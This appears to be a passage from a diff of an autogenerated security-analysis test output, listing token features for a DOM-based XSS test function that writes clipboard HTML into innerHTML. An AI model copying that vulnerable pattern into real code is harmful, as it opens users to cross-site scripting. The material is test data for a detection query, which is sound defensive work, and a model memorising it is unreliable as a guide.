enclosingFunctionBody | e ClipboardEvent Promise Array File dropItems Set File e clipboardData files length 0 i 0 i e clipboardData files length i file e clipboardData files i e clipboardData types includes text/html droppedHtml e clipboardData getData text/html container document createElement html container innerHTML droppedHtml imgs container getElementsByTagName img imgs length 1 src imgs 0 0 src dropItems add src e clipboardData types includes text/plain plainText e clipboardData getData text/plain /^https?:\\/\\//i test plainText dropItems add plainText imageItems Array from dropItems imageItems | +| autogenerated/Xss/DomBasedXss/clipboard.ts:75:11:75:14 | imgs | enclosingFunctionName | getClipboardData | +| autogenerated/Xss/DomBasedXss/clipboard.ts:75:11:75:14 | imgs | fileImports | | +| autogenerated/Xss/DomBasedXss/clipboard.ts:75:11:75:21 | imgs.length | contextFunctionInterfaces | getClipboardData(e)\ninstall(el)\nonpaste(e)\npaste(e) | +| autogenerated/Xss/DomBasedXss/clipboard.ts:75:11:75:21 | imgs.length | contextSurroundingFunctionParameters | (e) | +| autogenerated/Xss/DomBasedXss/clipboard.ts:75:11:75:21 | imgs.length | enclosingFunctionBody | e ClipboardEvent Promise Array File dropItems Set File e clipboardData files length 0 i 0 i e clipboardData files length i file e clipboardData files i e clipboardData types includes text/html droppedHtml e clipboardData getData text/html container document createElement html container innerHTML droppedHtml imgs container getElementsByTagName img imgs length 1 src imgs 0 0 src dropItems add src e clipboardData types includes text/plain plainText e clipboardData getData text/plain /^https?:\\/\\//i test plainText dropItems add plainText imageItems Array from dropItems imageItems | +| autogenerated/Xss/DomBasedXss/clipboard.ts:75:11:75:21 | imgs.length | enclosingFunctionName | getClipboardData | +| autogenerated/Xss/DomBasedXss/clipboard.ts:75:11:75:21 | imgs.length | fileImports | | +| autogenerated/Xss/DomBasedXss/clipboard.ts:75:11:75:27 | imgs.length === 1 | contextFunctionInterfaces | getClipboardData(e)\ninstall(el)\nonpaste(e)\npaste(e) | +| autogenerated/Xss/DomBasedXss/clipboard.ts:75:11:75:27 | imgs.length === 1 | contextSurroundingFunctionParameters | (e) | +| autogenerated/Xss/DomBasedXss/clipboard.ts:75:11:75:27 | imgs.length === 1 | enclosingFunctionBody | e ClipboardEvent Promise Array File dropItems Set File e clipboardData files length 0 i 0 i e clipboardData files length i file e clipboardData files i e clipboardData types includes text/html droppedHtml e clipboardData getData text/html container document createElement html container innerHTML droppedHtml imgs container getElementsByTagName img imgs length 1 src imgs 0 0 src dropItems add src e clipboardData types includes text/plain plainText e clipboardData getData text/plain /^https?:\\/\\//i test plainText dropItems add plainText imageItems Array from dropItems imageItems | +| autogenerated/Xss/DomBasedXss/clipboard.ts:75:11:75:27 | imgs.length === 1 | enclosingFunctionName | getClipboardData | +| autogenerated/Xss/DomBasedXss/clipboard.ts:75:11:75:27 | imgs.length === 1 | fileImports | | +| autogenerated/Xss/DomBasedXss/clipboard.ts:75:16:75:21 | length | contextFunctionInterfaces | getClipboardData(e)\ninstall(el)\nonpaste(e)\npaste(e) | +| autogenerated/Xss/DomBasedXss/clipboard.ts:75:16:75:21 | length | contextSurroundingFunctionParameters | (e) | +| autogenerated/Xss/DomBasedXss/clipboard.ts:75:16:75:21 | length | enclosingFunctionBody | e ClipboardEvent Promise Array File dropItems Set File e clipboardData files length 0 i 0 i e clipboardData files length i file e clipboardData files i e clipboardData types includes text/html droppedHtml e clipboardData getData text/html container document createElement html container innerHTML droppedHtml imgs container getElementsByTagName img imgs length 1 src imgs 0 0 src dropItems add src e clipboardData types includes text/plain plainText e clipboardData getData text/plain /^https?:\\/\\//i test plainText dropItems add plainText imageItems Array from dropItems imageItems | +| autogenerated/Xss/DomBasedXss/clipboard.ts:75:16:75:21 | length | enclosingFunctionName | getClipboardData | +| autogenerated/Xss/DomBasedXss/clipboard.ts:75:16:75:21 | length | fileImports | | +| autogenerated/Xss/DomBasedXss/clipboard.ts:75:27:75:27 | 1 | contextFunctionInterfaces | getClipboardData(e)\ninstall(el)\nonpaste(e)\npaste(e) | +| autogenerated/Xss/DomBasedXss/clipboard.ts:75:27:75:27 | 1 | contextSurroundingFunctionParameters | (e) | +| autogenerated/Xss/DomBasedXss/clipboard.ts:75:27:75:27 | 1 | enclosingFunctionBody | e ClipboardEvent Promise Array File dropItems Set File e clipboardData files length 0 i 0 i e clipboardData files length i file e clipboardData files i e clipboardData types includes text/html droppedHtml e clipboardData getData text/html container document createElement html container innerHTML droppedHtml imgs container getElementsByTagName img imgs length 1 src imgs 0 0 src dropItems add src e clipboardData types includes text/plain plainText e clipboardData getData text/plain /^https?:\\/\\//i test plainText dropItems add plainText imageItems Array from dropItems imageItems | +| autogenerated/Xss/DomBasedXss/clipboard.ts:75:27:75:27 | 1 | enclosingFunctionName | getClipboardData | +| autogenerated/Xss/DomBasedXss/clipboard.ts:75:27:75:27 | 1 | fileImports | | +| autogenerated/Xss/DomBasedXss/clipboard.ts:76:15:76:17 | src | contextFunctionInterfaces | getClipboardData(e)\ninstall(el)\nonpaste(e)\npaste(e) | +| autogenerated/Xss/DomBasedXss/clipboard.ts:76:15:76:17 | src | contextSurroundingFunctionParameters | (e) | +| autogenerated/Xss/DomBasedXss/clipboard.ts:76:15:76:17 | src | enclosingFunctionBody | e ClipboardEvent Promise Array File dropItems Set File e clipboardData files length 0 i 0 i e clipboardData files length i file e clipboardData files i e clipboardData types includes text/html droppedHtml e clipboardData getData text/html container document createElement html container innerHTML droppedHtml imgs container getElementsByTagName img imgs length 1 src imgs 0 0 src dropItems add src e clipboardData types includes text/plain plainText e clipboardData getData text/plain /^https?:\\/\\//i test plainText dropItems add plainText imageItems Array from dropItems imageItems | +| autogenerated/Xss/DomBasedXss/clipboard.ts:76:15:76:17 | src | enclosingFunctionName | getClipboardData | +| autogenerated/Xss/DomBasedXss/clipboard.ts:76:15:76:17 | src | fileImports | | +| autogenerated/Xss/DomBasedXss/clipboard.ts:76:15:76:31 | src | contextFunctionInterfaces | getClipboardData(e)\ninstall(el)\nonpaste(e)\npaste(e) | +| autogenerated/Xss/DomBasedXss/clipboard.ts:76:15:76:31 | src | contextSurroundingFunctionParameters | | +| autogenerated/Xss/DomBasedXss/clipboard.ts:76:15:76:31 | src | enclosingFunctionBody | e ClipboardEvent Promise Array File dropItems Set File e clipboardData files length 0 i 0 i e clipboardData files length i file e clipboardData files i e clipboardData types includes text/html droppedHtml e clipboardData getData text/html container document createElement html container innerHTML droppedHtml imgs container getElementsByTagName img imgs length 1 src imgs 0 0 src dropItems add src e clipboardData types includes text/plain plainText e clipboardData getData text/plain /^https?:\\/\\//i test plainText dropItems add plainText imageItems Array from dropItems imageItems | +| autogenerated/Xss/DomBasedXss/clipboard.ts:76:15:76:31 | src | enclosingFunctionName | getClipboardData | +| autogenerated/Xss/DomBasedXss/clipboard.ts:76:15:76:31 | src | fileImports | | +| autogenerated/Xss/DomBasedXss/clipboard.ts:76:15:76:31 | src = imgs[0].src | contextFunctionInterfaces | getClipboardData(e)\ninstall(el)\nonpaste(e)\npaste(e) | +| autogenerated/Xss/DomBasedXss/clipboard.ts:76:15:76:31 | src = imgs[0].src | contextSurroundingFunctionParameters | (e) | +| autogenerated/Xss/DomBasedXss/clipboard.ts:76:15:76:31 | src = imgs[0].src | enclosingFunctionBody | e ClipboardEvent Promise Array File dropItems Set File e clipboardData files length 0 i 0 i e clipboardData files length i file e clipboardData files i e clipboardData types includes text/html droppedHtml e clipboardData getData text/html container document createElement html container innerHTML droppedHtml imgs container getElementsByTagName img imgs length 1 src imgs 0 0 src dropItems add src e clipboardData types includes text/plain plainText e clipboardData getData text/plain /^https?:\\/\\//i test plainText dropItems add plainText imageItems Array from dropItems imageItems | +| autogenerated/Xss/DomBasedXss/clipboard.ts:76:15:76:31 | src = imgs[0].src | enclosingFunctionName | getClipboardData | +| autogenerated/Xss/DomBasedXss/clipboard.ts:76:15:76:31 | src = imgs[0].src | fileImports | | +| autogenerated/Xss/DomBasedXss/clipboard.ts:76:21:76:24 | imgs | contextFunctionInterfaces | getClipboardData(e)\ninstall(el)\nonpaste(e)\npaste(e) | +| autogenerated/Xss/DomBasedXss/clipboard.ts:76:21:76:24 | imgs | contextSurroundingFunctionParameters | (e) | +| autogenerated/Xss/DomBasedXss/clipboard.ts:76:21:76:24 | imgs | enclosingFunctionBody | e ClipboardEvent Promise Array File dropItems Set File e clipboardData files length 0 i 0 i e clipboardData files length i file e clipboardData files i e clipboardData types includes text/html droppedHtml e clipboardData getData text/html container document createElement html container innerHTML droppedHtml imgs container getElementsByTagName img imgs length 1 src imgs 0 0 src dropItems add src e clipboardData types includes text/plain plainText e clipboardData getData text/plain /^https?:\\/\\//i test plainText dropItems add plainText imageItems Array from dropItems imageItems | +| autogenerated/Xss/DomBasedXss/clipboard.ts:76:21:76:24 | imgs | enclosingFunctionName | getClipboardData | +| autogenerated/Xss/DomBasedXss/clipboard.ts:76:21:76:24 | imgs | fileImports | | +| autogenerated/Xss/DomBasedXss/clipboard.ts:76:21:76:27 | imgs[0] | contextFunctionInterfaces | getClipboardData(e)\ninstall(el)\nonpaste(e)\npaste(e) | +| autogenerated/Xss/DomBasedXss/clipboard.ts:76:21:76:27 | imgs[0] | contextSurroundingFunctionParameters | (e) | +| autogenerated/Xss/DomBasedXss/clipboard.ts:76:21:76:27 | imgs[0] | enclosingFunctionBody | e ClipboardEvent Promise Array File dropItems Set File e clipboardData files length 0 i 0 i e clipboardData files length i file e clipboardData files i e clipboardData types includes text/html droppedHtml e clipboardData getData text/html container document createElement html container innerHTML droppedHtml imgs container getElementsByTagName img imgs length 1 src imgs 0 0 src dropItems add src e clipboardData types includes text/plain plainText e clipboardData getData text/plain /^https?:\\/\\//i test plainText dropItems add plainText imageItems Array from dropItems imageItems | +| autogenerated/Xss/DomBasedXss/clipboard.ts:76:21:76:27 | imgs[0] | enclosingFunctionName | getClipboardData | +| autogenerated/Xss/DomBasedXss/clipboard.ts:76:21:76:27 | imgs[0] | fileImports | | +| autogenerated/Xss/DomBasedXss/clipboard.ts:76:21:76:31 | imgs[0].src | contextFunctionInterfaces | getClipboardData(e)\ninstall(el)\nonpaste(e)\npaste(e) | +| autogenerated/Xss/DomBasedXss/clipboard.ts:76:21:76:31 | imgs[0].src | contextSurroundingFunctionParameters | (e) | +| autogenerated/Xss/DomBasedXss/clipboard.ts:76:21:76:31 | imgs[0].src | enclosingFunctionBody | e ClipboardEvent Promise Array File dropItems Set File e clipboardData files length 0 i 0 i e clipboardData files length i file e clipboardData files i e clipboardData types includes text/html droppedHtml e clipboardData getData text/html container document createElement html container innerHTML droppedHtml imgs container getElementsByTagName img imgs length 1 src imgs 0 0 src dropItems add src e clipboardData types includes text/plain plainText e clipboardData getData text/plain /^https?:\\/\\//i test plainText dropItems add plainText imageItems Array from dropItems imageItems | +| autogenerated/Xss/DomBasedXss/clipboard.ts:76:21:76:31 | imgs[0].src | enclosingFunctionName | getClipboardData | +| autogenerated/Xss/DomBasedXss/clipboard.ts:76:21:76:31 | imgs[0].src | fileImports | | +| autogenerated/Xss/DomBasedXss/clipboard.ts:76:26:76:26 | 0 | contextFunctionInterfaces | getClipboardData(e)\ninstall(el)\nonpaste(e)\npaste(e) | +| autogenerated/Xss/DomBasedXss/clipboard.ts:76:26:76:26 | 0 | contextSurroundingFunctionParameters | (e) | +| autogenerated/Xss/DomBasedXss/clipboard.ts:76:26:76:26 | 0 | enclosingFunctionBody | e ClipboardEvent Promise Array File dropItems Set File e clipboardData files length 0 i 0 i e clipboardData files length i file e clipboardData files i e clipboardData types includes text/html droppedHtml e clipboardData getData text/html container document createElement html container innerHTML droppedHtml imgs container getElementsByTagName img imgs length 1 src imgs 0 0 src dropItems add src e clipboardData types includes text/plain plainText e clipboardData getData text/plain /^https?:\\/\\//i test plainText dropItems add plainText imageItems Array from dropItems imageItems | +| autogenerated/Xss/DomBasedXss/clipboard.ts:76:26:76:26 | 0 | enclosingFunctionName | getClipboardData | +| autogenerated/Xss/DomBasedXss/clipboard.ts:76:26:76:26 | 0 | fileImports | | +| autogenerated/Xss/DomBasedXss/clipboard.ts:76:29:76:31 | src | contextFunctionInterfaces | getClipboardData(e)\ninstall(el)\nonpaste(e)\npaste(e) | +| autogenerated/Xss/DomBasedXss/clipboard.ts:76:29:76:31 | src | contextSurroundingFunctionParameters | (e) | +| autogenerated/Xss/DomBasedXss/clipboard.ts:76:29:76:31 | src | enclosingFunctionBody | e ClipboardEvent Promise Array File dropItems Set File e clipboardData files length 0 i 0 i e clipboardData files length i file e clipboardData files i e clipboardData types includes text/html droppedHtml e clipboardData getData text/html container document createElement html container innerHTML droppedHtml imgs container getElementsByTagName img imgs length 1 src imgs 0 0 src dropItems add src e clipboardData types includes text/plain plainText e clipboardData getData text/plain /^https?:\\/\\//i test plainText dropItems add plainText imageItems Array from dropItems imageItems | +| autogenerated/Xss/DomBasedXss/clipboard.ts:76:29:76:31 | src | enclosingFunctionName | getClipboardData | +| autogenerated/Xss/DomBasedXss/clipboard.ts:76:29:76:31 | src | fileImports | | +| autogenerated/Xss/DomBasedXss/clipboard.ts:77:9:77:17 | dropItems | contextFunctionInterfaces | getClipboardData(e)\ninstall(el)\nonpaste(e)\npaste(e) | +| autogenerated/Xss/DomBasedXss/clipboard.ts:77:9:77:17 | dropItems | contextSurroundingFunctionParameters | (e) | +| autogenerated/Xss/DomBasedXss/clipboard.ts:77:9:77:17 | dropItems | enclosingFunctionBody | e ClipboardEvent Promise Array File dropItems Set File e clipboardData files length 0 i 0 i e clipboardData files length i file e clipboardData files i e clipboardData types includes text/html droppedHtml e clipboardData getData text/html container document createElement html container innerHTML droppedHtml imgs container getElementsByTagName img imgs length 1 src imgs 0 0 src dropItems add src e clipboardData types includes text/plain plainText e clipboardData getData text/plain /^https?:\\/\\//i test plainText dropItems add plainText imageItems Array from dropItems imageItems | +| autogenerated/Xss/DomBasedXss/clipboard.ts:77:9:77:17 | dropItems | enclosingFunctionName | getClipboardData | +| autogenerated/Xss/DomBasedXss/clipboard.ts:77:9:77:17 | dropItems | fileImports | | +| autogenerated/Xss/DomBasedXss/clipboard.ts:77:9:77:21 | dropItems.add | contextFunctionInterfaces | getClipboardData(e)\ninstall(el)\nonpaste(e)\npaste(e) | +| autogenerated/Xss/DomBasedXss/clipboard.ts:77:9:77:21 | dropItems.add | contextSurroundingFunctionParameters | (e) | +| autogenerated/Xss/DomBasedXss/clipboard.ts:77:9:77:21 | dropItems.add | enclosingFunctionBody | e ClipboardEvent Promise Array File dropItems Set File e clipboardData files length 0 i 0 i e clipboardData files length i file e clipboardData files i e clipboardData types includes text/html droppedHtml e clipboardData getData text/html container document createElement html container innerHTML droppedHtml imgs container getElementsByTagName img imgs length 1 src imgs 0 0 src dropItems add src e clipboardData types includes text/plain plainText e clipboardData getData text/plain /^https?:\\/\\//i test plainText dropItems add plainText imageItems Array from dropItems imageItems | +| autogenerated/Xss/DomBasedXss/clipboard.ts:77:9:77:21 | dropItems.add | enclosingFunctionName | getClipboardData | +| autogenerated/Xss/DomBasedXss/clipboard.ts:77:9:77:21 | dropItems.add | fileImports | | +| autogenerated/Xss/DomBasedXss/clipboard.ts:77:9:77:26 | dropItems.add(src) | contextFunctionInterfaces | getClipboardData(e)\ninstall(el)\nonpaste(e)\npaste(e) | +| autogenerated/Xss/DomBasedXss/clipboard.ts:77:9:77:26 | dropItems.add(src) | contextSurroundingFunctionParameters | (e) | +| autogenerated/Xss/DomBasedXss/clipboard.ts:77:9:77:26 | dropItems.add(src) | enclosingFunctionBody | e ClipboardEvent Promise Array File dropItems Set File e clipboardData files length 0 i 0 i e clipboardData files length i file e clipboardData files i e clipboardData types includes text/html droppedHtml e clipboardData getData text/html container document createElement html container innerHTML droppedHtml imgs container getElementsByTagName img imgs length 1 src imgs 0 0 src dropItems add src e clipboardData types includes text/plain plainText e clipboardData getData text/plain /^https?:\\/\\//i test plainText dropItems add plainText imageItems Array from dropItems imageItems | +| autogenerated/Xss/DomBasedXss/clipboard.ts:77:9:77:26 | dropItems.add(src) | enclosingFunctionName | getClipboardData | +| autogenerated/Xss/DomBasedXss/clipboard.ts:77:9:77:26 | dropItems.add(src) | fileImports | | +| autogenerated/Xss/DomBasedXss/clipboard.ts:77:9:77:26 | exceptional return of dropItems.add(src) | contextFunctionInterfaces | getClipboardData(e)\ninstall(el)\nonpaste(e)\npaste(e) | +| autogenerated/Xss/DomBasedXss/clipboard.ts:77:9:77:26 | exceptional return of dropItems.add(src) | contextSurroundingFunctionParameters | | +| autogenerated/Xss/DomBasedXss/clipboard.ts:77:9:77:26 | exceptional return of dropItems.add(src) | enclosingFunctionBody | e ClipboardEvent Promise Array File dropItems Set File e clipboardData files length 0 i 0 i e clipboardData files length i file e clipboardData files i e clipboardData types includes text/html droppedHtml e clipboardData getData text/html container document createElement html container innerHTML droppedHtml imgs container getElementsByTagName img imgs length 1 src imgs 0 0 src dropItems add src e clipboardData types includes text/plain plainText e clipboardData getData text/plain /^https?:\\/\\//i test plainText dropItems add plainText imageItems Array from dropItems imageItems | +| autogenerated/Xss/DomBasedXss/clipboard.ts:77:9:77:26 | exceptional return of dropItems.add(src) | enclosingFunctionName | getClipboardData | +| autogenerated/Xss/DomBasedXss/clipboard.ts:77:9:77:26 | exceptional return of dropItems.add(src) | fileImports | | +| autogenerated/Xss/DomBasedXss/clipboard.ts:77:19:77:21 | add | contextFunctionInterfaces | getClipboardData(e)\ninstall(el)\nonpaste(e)\npaste(e) | +| autogenerated/Xss/DomBasedXss/clipboard.ts:77:19:77:21 | add | contextSurroundingFunctionParameters | (e) | +| autogenerated/Xss/DomBasedXss/clipboard.ts:77:19:77:21 | add | enclosingFunctionBody | e ClipboardEvent Promise Array File dropItems Set File e clipboardData files length 0 i 0 i e clipboardData files length i file e clipboardData files i e clipboardData types includes text/html droppedHtml e clipboardData getData text/html container document createElement html container innerHTML droppedHtml imgs container getElementsByTagName img imgs length 1 src imgs 0 0 src dropItems add src e clipboardData types includes text/plain plainText e clipboardData getData text/plain /^https?:\\/\\//i test plainText dropItems add plainText imageItems Array from dropItems imageItems | +| autogenerated/Xss/DomBasedXss/clipboard.ts:77:19:77:21 | add | enclosingFunctionName | getClipboardData | +| autogenerated/Xss/DomBasedXss/clipboard.ts:77:19:77:21 | add | fileImports | | | autogenerated/Xss/DomBasedXss/clipboard.ts:77:23:77:25 | src | CalleeFlexibleAccessPath | dropItems.add | | autogenerated/Xss/DomBasedXss/clipboard.ts:77:23:77:25 | src | InputArgumentIndex | 0 | | autogenerated/Xss/DomBasedXss/clipboard.ts:77:23:77:25 | src | contextFunctionInterfaces | getClipboardData(e)\ninstall(el)\nonpaste(e)\npaste(e) | @@ -12634,6 +94921,51 @@ tokenFeatures | autogenerated/Xss/DomBasedXss/clipboard.ts:77:23:77:25 | src | enclosingFunctionName | getClipboardData | | autogenerated/Xss/DomBasedXss/clipboard.ts:77:23:77:25 | src | fileImports | | | autogenerated/Xss/DomBasedXss/clipboard.ts:77:23:77:25 | src | receiverName | dropItems | +| autogenerated/Xss/DomBasedXss/clipboard.ts:79:16:79:16 | e | contextFunctionInterfaces | getClipboardData(e)\ninstall(el)\nonpaste(e)\npaste(e) | +| autogenerated/Xss/DomBasedXss/clipboard.ts:79:16:79:16 | e | contextSurroundingFunctionParameters | (e) | +| autogenerated/Xss/DomBasedXss/clipboard.ts:79:16:79:16 | e | enclosingFunctionBody | e ClipboardEvent Promise Array File dropItems Set File e clipboardData files length 0 i 0 i e clipboardData files length i file e clipboardData files i e clipboardData types includes text/html droppedHtml e clipboardData getData text/html container document createElement html container innerHTML droppedHtml imgs container getElementsByTagName img imgs length 1 src imgs 0 0 src dropItems add src e clipboardData types includes text/plain plainText e clipboardData getData text/plain /^https?:\\/\\//i test plainText dropItems add plainText imageItems Array from dropItems imageItems | +| autogenerated/Xss/DomBasedXss/clipboard.ts:79:16:79:16 | e | enclosingFunctionName | getClipboardData | +| autogenerated/Xss/DomBasedXss/clipboard.ts:79:16:79:16 | e | fileImports | | +| autogenerated/Xss/DomBasedXss/clipboard.ts:79:16:79:30 | e.clipboardData | contextFunctionInterfaces | getClipboardData(e)\ninstall(el)\nonpaste(e)\npaste(e) | +| autogenerated/Xss/DomBasedXss/clipboard.ts:79:16:79:30 | e.clipboardData | contextSurroundingFunctionParameters | (e) | +| autogenerated/Xss/DomBasedXss/clipboard.ts:79:16:79:30 | e.clipboardData | enclosingFunctionBody | e ClipboardEvent Promise Array File dropItems Set File e clipboardData files length 0 i 0 i e clipboardData files length i file e clipboardData files i e clipboardData types includes text/html droppedHtml e clipboardData getData text/html container document createElement html container innerHTML droppedHtml imgs container getElementsByTagName img imgs length 1 src imgs 0 0 src dropItems add src e clipboardData types includes text/plain plainText e clipboardData getData text/plain /^https?:\\/\\//i test plainText dropItems add plainText imageItems Array from dropItems imageItems | +| autogenerated/Xss/DomBasedXss/clipboard.ts:79:16:79:30 | e.clipboardData | enclosingFunctionName | getClipboardData | +| autogenerated/Xss/DomBasedXss/clipboard.ts:79:16:79:30 | e.clipboardData | fileImports | | +| autogenerated/Xss/DomBasedXss/clipboard.ts:79:16:79:36 | e.clipb ... a.types | contextFunctionInterfaces | getClipboardData(e)\ninstall(el)\nonpaste(e)\npaste(e) | +| autogenerated/Xss/DomBasedXss/clipboard.ts:79:16:79:36 | e.clipb ... a.types | contextSurroundingFunctionParameters | (e) | +| autogenerated/Xss/DomBasedXss/clipboard.ts:79:16:79:36 | e.clipb ... a.types | enclosingFunctionBody | e ClipboardEvent Promise Array File dropItems Set File e clipboardData files length 0 i 0 i e clipboardData files length i file e clipboardData files i e clipboardData types includes text/html droppedHtml e clipboardData getData text/html container document createElement html container innerHTML droppedHtml imgs container getElementsByTagName img imgs length 1 src imgs 0 0 src dropItems add src e clipboardData types includes text/plain plainText e clipboardData getData text/plain /^https?:\\/\\//i test plainText dropItems add plainText imageItems Array from dropItems imageItems | +| autogenerated/Xss/DomBasedXss/clipboard.ts:79:16:79:36 | e.clipb ... a.types | enclosingFunctionName | getClipboardData | +| autogenerated/Xss/DomBasedXss/clipboard.ts:79:16:79:36 | e.clipb ... a.types | fileImports | | +| autogenerated/Xss/DomBasedXss/clipboard.ts:79:16:79:45 | e.clipb ... ncludes | contextFunctionInterfaces | getClipboardData(e)\ninstall(el)\nonpaste(e)\npaste(e) | +| autogenerated/Xss/DomBasedXss/clipboard.ts:79:16:79:45 | e.clipb ... ncludes | contextSurroundingFunctionParameters | (e) | +| autogenerated/Xss/DomBasedXss/clipboard.ts:79:16:79:45 | e.clipb ... ncludes | enclosingFunctionBody | e ClipboardEvent Promise Array File dropItems Set File e clipboardData files length 0 i 0 i e clipboardData files length i file e clipboardData files i e clipboardData types includes text/html droppedHtml e clipboardData getData text/html container document createElement html container innerHTML droppedHtml imgs container getElementsByTagName img imgs length 1 src imgs 0 0 src dropItems add src e clipboardData types includes text/plain plainText e clipboardData getData text/plain /^https?:\\/\\//i test plainText dropItems add plainText imageItems Array from dropItems imageItems | +| autogenerated/Xss/DomBasedXss/clipboard.ts:79:16:79:45 | e.clipb ... ncludes | enclosingFunctionName | getClipboardData | +| autogenerated/Xss/DomBasedXss/clipboard.ts:79:16:79:45 | e.clipb ... ncludes | fileImports | | +| autogenerated/Xss/DomBasedXss/clipboard.ts:79:16:79:59 | e.clipb ... plain') | contextFunctionInterfaces | getClipboardData(e)\ninstall(el)\nonpaste(e)\npaste(e) | +| autogenerated/Xss/DomBasedXss/clipboard.ts:79:16:79:59 | e.clipb ... plain') | contextSurroundingFunctionParameters | (e) | +| autogenerated/Xss/DomBasedXss/clipboard.ts:79:16:79:59 | e.clipb ... plain') | enclosingFunctionBody | e ClipboardEvent Promise Array File dropItems Set File e clipboardData files length 0 i 0 i e clipboardData files length i file e clipboardData files i e clipboardData types includes text/html droppedHtml e clipboardData getData text/html container document createElement html container innerHTML droppedHtml imgs container getElementsByTagName img imgs length 1 src imgs 0 0 src dropItems add src e clipboardData types includes text/plain plainText e clipboardData getData text/plain /^https?:\\/\\//i test plainText dropItems add plainText imageItems Array from dropItems imageItems | +| autogenerated/Xss/DomBasedXss/clipboard.ts:79:16:79:59 | e.clipb ... plain') | enclosingFunctionName | getClipboardData | +| autogenerated/Xss/DomBasedXss/clipboard.ts:79:16:79:59 | e.clipb ... plain') | fileImports | | +| autogenerated/Xss/DomBasedXss/clipboard.ts:79:16:79:59 | exceptional return of e.clipb ... plain') | contextFunctionInterfaces | getClipboardData(e)\ninstall(el)\nonpaste(e)\npaste(e) | +| autogenerated/Xss/DomBasedXss/clipboard.ts:79:16:79:59 | exceptional return of e.clipb ... plain') | contextSurroundingFunctionParameters | | +| autogenerated/Xss/DomBasedXss/clipboard.ts:79:16:79:59 | exceptional return of e.clipb ... plain') | enclosingFunctionBody | e ClipboardEvent Promise Array File dropItems Set File e clipboardData files length 0 i 0 i e clipboardData files length i file e clipboardData files i e clipboardData types includes text/html droppedHtml e clipboardData getData text/html container document createElement html container innerHTML droppedHtml imgs container getElementsByTagName img imgs length 1 src imgs 0 0 src dropItems add src e clipboardData types includes text/plain plainText e clipboardData getData text/plain /^https?:\\/\\//i test plainText dropItems add plainText imageItems Array from dropItems imageItems | +| autogenerated/Xss/DomBasedXss/clipboard.ts:79:16:79:59 | exceptional return of e.clipb ... plain') | enclosingFunctionName | getClipboardData | +| autogenerated/Xss/DomBasedXss/clipboard.ts:79:16:79:59 | exceptional return of e.clipb ... plain') | fileImports | | +| autogenerated/Xss/DomBasedXss/clipboard.ts:79:18:79:30 | clipboardData | contextFunctionInterfaces | getClipboardData(e)\ninstall(el)\nonpaste(e)\npaste(e) | +| autogenerated/Xss/DomBasedXss/clipboard.ts:79:18:79:30 | clipboardData | contextSurroundingFunctionParameters | (e) | +| autogenerated/Xss/DomBasedXss/clipboard.ts:79:18:79:30 | clipboardData | enclosingFunctionBody | e ClipboardEvent Promise Array File dropItems Set File e clipboardData files length 0 i 0 i e clipboardData files length i file e clipboardData files i e clipboardData types includes text/html droppedHtml e clipboardData getData text/html container document createElement html container innerHTML droppedHtml imgs container getElementsByTagName img imgs length 1 src imgs 0 0 src dropItems add src e clipboardData types includes text/plain plainText e clipboardData getData text/plain /^https?:\\/\\//i test plainText dropItems add plainText imageItems Array from dropItems imageItems | +| autogenerated/Xss/DomBasedXss/clipboard.ts:79:18:79:30 | clipboardData | enclosingFunctionName | getClipboardData | +| autogenerated/Xss/DomBasedXss/clipboard.ts:79:18:79:30 | clipboardData | fileImports | | +| autogenerated/Xss/DomBasedXss/clipboard.ts:79:32:79:36 | types | contextFunctionInterfaces | getClipboardData(e)\ninstall(el)\nonpaste(e)\npaste(e) | +| autogenerated/Xss/DomBasedXss/clipboard.ts:79:32:79:36 | types | contextSurroundingFunctionParameters | (e) | +| autogenerated/Xss/DomBasedXss/clipboard.ts:79:32:79:36 | types | enclosingFunctionBody | e ClipboardEvent Promise Array File dropItems Set File e clipboardData files length 0 i 0 i e clipboardData files length i file e clipboardData files i e clipboardData types includes text/html droppedHtml e clipboardData getData text/html container document createElement html container innerHTML droppedHtml imgs container getElementsByTagName img imgs length 1 src imgs 0 0 src dropItems add src e clipboardData types includes text/plain plainText e clipboardData getData text/plain /^https?:\\/\\//i test plainText dropItems add plainText imageItems Array from dropItems imageItems | +| autogenerated/Xss/DomBasedXss/clipboard.ts:79:32:79:36 | types | enclosingFunctionName | getClipboardData | +| autogenerated/Xss/DomBasedXss/clipboard.ts:79:32:79:36 | types | fileImports | | +| autogenerated/Xss/DomBasedXss/clipboard.ts:79:38:79:45 | includes | contextFunctionInterfaces | getClipboardData(e)\ninstall(el)\nonpaste(e)\npaste(e) | +| autogenerated/Xss/DomBasedXss/clipboard.ts:79:38:79:45 | includes | contextSurroundingFunctionParameters | (e) | +| autogenerated/Xss/DomBasedXss/clipboard.ts:79:38:79:45 | includes | enclosingFunctionBody | e ClipboardEvent Promise Array File dropItems Set File e clipboardData files length 0 i 0 i e clipboardData files length i file e clipboardData files i e clipboardData types includes text/html droppedHtml e clipboardData getData text/html container document createElement html container innerHTML droppedHtml imgs container getElementsByTagName img imgs length 1 src imgs 0 0 src dropItems add src e clipboardData types includes text/plain plainText e clipboardData getData text/plain /^https?:\\/\\//i test plainText dropItems add plainText imageItems Array from dropItems imageItems | +| autogenerated/Xss/DomBasedXss/clipboard.ts:79:38:79:45 | includes | enclosingFunctionName | getClipboardData | +| autogenerated/Xss/DomBasedXss/clipboard.ts:79:38:79:45 | includes | fileImports | | | autogenerated/Xss/DomBasedXss/clipboard.ts:79:47:79:58 | 'text/plain' | CalleeFlexibleAccessPath | e.clipboardData.types.includes | | autogenerated/Xss/DomBasedXss/clipboard.ts:79:47:79:58 | 'text/plain' | InputArgumentIndex | 0 | | autogenerated/Xss/DomBasedXss/clipboard.ts:79:47:79:58 | 'text/plain' | contextFunctionInterfaces | getClipboardData(e)\ninstall(el)\nonpaste(e)\npaste(e) | @@ -12641,6 +94973,56 @@ tokenFeatures | autogenerated/Xss/DomBasedXss/clipboard.ts:79:47:79:58 | 'text/plain' | enclosingFunctionBody | e ClipboardEvent Promise Array File dropItems Set File e clipboardData files length 0 i 0 i e clipboardData files length i file e clipboardData files i e clipboardData types includes text/html droppedHtml e clipboardData getData text/html container document createElement html container innerHTML droppedHtml imgs container getElementsByTagName img imgs length 1 src imgs 0 0 src dropItems add src e clipboardData types includes text/plain plainText e clipboardData getData text/plain /^https?:\\/\\//i test plainText dropItems add plainText imageItems Array from dropItems imageItems | | autogenerated/Xss/DomBasedXss/clipboard.ts:79:47:79:58 | 'text/plain' | enclosingFunctionName | getClipboardData | | autogenerated/Xss/DomBasedXss/clipboard.ts:79:47:79:58 | 'text/plain' | fileImports | | +| autogenerated/Xss/DomBasedXss/clipboard.ts:80:13:80:21 | plainText | contextFunctionInterfaces | 